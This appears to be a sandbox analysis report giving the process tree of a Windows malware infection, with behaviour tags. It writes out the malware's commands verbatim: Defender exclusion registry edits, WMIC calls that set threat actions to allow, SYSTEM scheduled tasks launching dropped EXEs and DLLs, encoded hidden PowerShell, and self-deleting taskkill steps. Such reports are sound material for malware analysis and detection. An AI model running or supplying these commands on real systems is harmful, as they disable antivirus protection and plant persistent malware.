C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nyFjvKGtfVGLAKAU /t REG_DWORD /d 0 /reg:644⤵
-
[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gsaFyPMzr" /SC once /ST 16:06:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  (the UTF-16LE base64 EncodedCommand decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gsaFyPMzr"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gsaFyPMzr"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xsEpqqHAgqAwsAroz" /SC once /ST 05:11:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exe\" za /site_id 668658 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "xsEpqqHAgqAwsAroz"

[depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

[depth 3] C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force

[depth 2] C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exe
  C:\Windows\Temp\nyFjvKGtfVGLAKAU\PmsBVDuTBNtRlfz\PovXUCA.exe za /site_id 668658 /S
  - Checks computer location settings
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS

[depth 3] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  - Blocklisted process makes network request
  - Loads dropped DLL

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
  - Suspicious use of SetThreadContext

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bRciptYQhTCMvEFWGJ"

[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\STjmdXhOU\dxARth.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ArGDBXWmyYtLacf" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

[depth 4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ArGDBXWmyYtLacf2" /F /xml "C:\Program Files (x86)\STjmdXhOU\MyZHJOT.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ArGDBXWmyYtLacf"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ArGDBXWmyYtLacf"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "dqMFPCMVHmhnSY" /F /xml "C:\Program Files (x86)\gaSWcYIjjvwU2\sCjgdHE.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sOuBCsGGBJoge2" /F /xml "C:\ProgramData\QPFeEjmgnBUOfRVB\GrmGnlE.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gdlTlvZfIMOZAvCeb2" /F /xml "C:\Program Files (x86)\YceypsUXabDXnCzNCPR\hqHhhng.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "PcFGIyIlUJyYablHCHc2" /F /xml "C:\Program Files (x86)\NMbcPgNClKinC\awJHiwg.xml" /RU "SYSTEM"
  - Blocklisted process makes network request
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "nMmJzTJTMvgDqJXEl" /SC once /ST 08:50:40 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll\",#1 /site_id 668658" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

[depth 4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "nMmJzTJTMvgDqJXEl"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "spujSHjvBOHs" /SC once /ST 17:44:38 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exe\" 3L /S"
  - Creates scheduled task(s)

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "spujSHjvBOHs"

[depth 4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "spujSHjvBOHs"

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "spujSHjvBOHs"

[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

[depth 3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

[depth 3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "xsEpqqHAgqAwsAroz"
  - Blocklisted process makes network request

[depth 2] \??\c:\windows\system32\rundll32.EXE
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll",#1 /site_id 668658

[depth 3] C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\nyFjvKGtfVGLAKAU\jPMmyCas\wUZkNXn.dll",#1 /site_id 668658
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS

[depth 4] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "nMmJzTJTMvgDqJXEl"

[depth 2] C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exe
  C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\pDKMbayM\zxzLMwG.exe 3L /S
  - Modifies Internet Explorer settings

[depth 3] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  - Blocklisted process makes network request

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 2] C:\Users\Admin\AppData\Roaming\ustucsu
  C:\Users\Admin\AppData\Roaming\ustucsu
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

[depth 2] C:\Users\Admin\AppData\Roaming\jftucsu
  C:\Users\Admin\AppData\Roaming\jftucsu
  - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Roaming\jftucsu
  C:\Users\Admin\AppData\Roaming\jftucsu

[depth 2] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task
  - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task

[depth 2] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task
  - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task

[depth 2] C:\Users\Admin\AppData\Roaming\ustucsu
  C:\Users\Admin\AppData\Roaming\ustucsu
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection

[depth 2] C:\Users\Admin\AppData\Roaming\jftucsu
  C:\Users\Admin\AppData\Roaming\jftucsu
  - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Roaming\jftucsu
  C:\Users\Admin\AppData\Roaming\jftucsu

[depth 2] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task
  - Suspicious use of SetThreadContext

[depth 3] C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe
  C:\Users\Admin\AppData\Local\7b094cea-f672-4562-9e16-411086b96df0\DCC6.exe --Task

[depth 1] c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

[depth 1] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20de8d8504.exe
  Sat20de8d8504.exe
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection

[depth 1] C:\Users\Admin\AppData\Local\Temp\is-CE48P.tmp\Sat20fbae42a4.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-CE48P.tmp\Sat20fbae42a4.tmp" /SL5="$A003A,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20fbae42a4.exe"
  - Executes dropped EXE
  - Loads dropped DLL

[depth 2] C:\Users\Admin\AppData\Local\Temp\is-VFETQ.tmp\Ze2ro.exe
  "C:\Users\Admin\AppData\Local\Temp\is-VFETQ.tmp\Ze2ro.exe" /S /UID=burnerch2
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken

[depth 3] C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe
  "C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe" /VERYSILENT

[depth 4] C:\Users\Admin\AppData\Local\Temp\is-HAG27.tmp\ultramediaburner.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-HAG27.tmp\ultramediaburner.tmp" /SL5="$203E2,281924,62464,C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe" /VERYSILENT
  - Drops file in Program Files directory
  - Suspicious use of FindShellTrayWindow

[depth 5] C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
  - Executes dropped EXE

[depth 3] C:\Users\Admin\AppData\Local\Temp\35-b6682-3e7-e0b82-f2c57efe1be68\Direhilomi.exe
  "C:\Users\Admin\AppData\Local\Temp\35-b6682-3e7-e0b82-f2c57efe1be68\Direhilomi.exe"
  - Checks computer location settings

[depth 3] C:\Users\Admin\AppData\Local\Temp\b5-adbe7-0ae-1d288-55e912e067319\Qaemukyrely.exe
  "C:\Users\Admin\AppData\Local\Temp\b5-adbe7-0ae-1d288-55e912e067319\Qaemukyrely.exe"

[depth 1] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20627fa1c49.exe
  Sat20627fa1c49.exe
  - Executes dropped EXE

[depth 1] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exe
  Sat20545a92617f.exe /mixone
  - Executes dropped EXE

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 660
  - Program crash
  - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 676
  - Program crash

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 688
  - Program crash

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 740
  - Program crash

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 900
  - Program crash

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 972
  - Program crash

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 1180
  - Program crash

[depth 2] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat20545a92617f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20545a92617f.exe" & exit

[depth 3] C:\Windows\SysWOW64\taskkill.exe
  taskkill /im "Sat20545a92617f.exe" /f
  - Kills process with taskkill

[depth 1] C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken

[depth 1] \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s BITS

[depth 1] \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

[depth 1] C:\Windows\system32\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process

[depth 2] C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

[depth 1] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

[depth 1] C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe
  C:\Windows\SysWOW64\qinbwhni\ushtnjuk.exe /d"C:\Users\Admin\AppData\Local\Temp\72AC.exe"
  - Suspicious use of SetThreadContext

[depth 2] C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  - Drops file in System32 directory
